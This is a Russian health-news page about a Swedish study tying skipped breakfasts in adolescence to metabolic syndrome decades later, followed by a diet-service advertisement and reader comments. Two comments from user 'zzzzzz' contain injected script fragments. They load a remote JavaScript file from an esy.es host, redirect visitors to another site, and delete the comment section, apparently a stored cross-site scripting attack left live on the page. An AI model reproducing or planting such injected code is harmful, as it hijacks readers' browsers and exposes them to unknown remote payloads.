Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Плохой завтрак в молодост...  >>  Плохой завтрак в молодости приводит к ожирению у взрослых
 
Обратная связь
 

Плохой завтрак в молодости приводит к ожирению у взрослых

Размер шрифта
16 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Если вы по-прежнему, несмотря на все наши увещевания, завтракаете святым духом и маковой росинкой, результаты нового исследования шведского университета придутся вам не по нутру.

Плохой завтрак в молодости приводит к ожирению у взрослых

Ученые выяснили, что у подростков, которые пренебрегали плотным завтраком, с большей вероятностью развивался метаболический синдром в будущем (спустя 27 лет и более).

Метаболический синдром – это собирательный термин, охватывающий всю совокупность факторов, которые приводят к повышению вероятности развития сердечно-сосудистых заболеваний. Такими факторами являются ожирение, повышенный уровень триглицеридов и холестерина, артериальная гипертензия, нарушение толерантности к глюкозе и так далее.

В 1981 году, на старте научной работы ученые просили старшеклассников из города Лулео заполнить анкету, вопросы в которой касались в первую очередь позиций их утреннего меню. 27 лет спустя респонденты прошли полный медицинский осмотр, в ходе которого эксперты с особой тщательностью искали признаки метаболического синдрома.

Оказалось, что в группе молодых людей, которые пренебрегали завтраком или же вовсе отказывались от него, инцидентность (читай – встречаемость) метаболического синдрома была на 68% выше, чем у тех, кто в детстве завтракал полноценно. Данная закономерность сохранилась и после учета сторонних факторов, таких как социальный статус, образование и образ жизни испытуемых. Сильнее всего с плохим завтраком коррелировали абдоминальное ожирение и повышенный уровень сахара крови натощак.

«Конечно, необходимы дополнительные исследования с тем, чтобы понять механизмы, лежащие в основе этой закономерности, однако полученные нами результаты и ряд уже имевшихся однозначно свидетельствуют о том, что низкое качество завтрака в детские годы может пагубно влиять на регуляцию углеводного обмена и метаболический статус в целом», – убеждена Мария Веннберг, ведущий автор исследования.

Что ж, лишний довод в пользу, что отказываться от завтрака – безумие.

Для тех кто хочет похудеть, создана «Диета Елены Малышевой». Уже готовая правильная еда будет доставлена вам в любое время и место. Вам останется только есть и худеть!
Другие секреты похудения щедро раскрываются на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

06 августа 2014 в 00:03

Цитировать   |   Пожаловаться

Ого, никогда бы не подумала, что завтраки в ранние годы так аукнутся! В институте завтракать вообще не получалось, то некогда, то не хотелось, так и привыкла. Только последнее время хочется с утра что-то съесть. А вес после 30 начал прибавляться (( теперь вот сгоняю лишние килограммы, таблетки с литрамином принимаю, спортом заниматься пытаюсь, а надо было всего-то в юности завтракать!

2 - zzzzzz

30 июня 2015 в 18:42

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выключите компьютер! Из-за него вы толстеете!   Даже свет во сне приводит к лишним килограммам! Как похудеть?!   Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.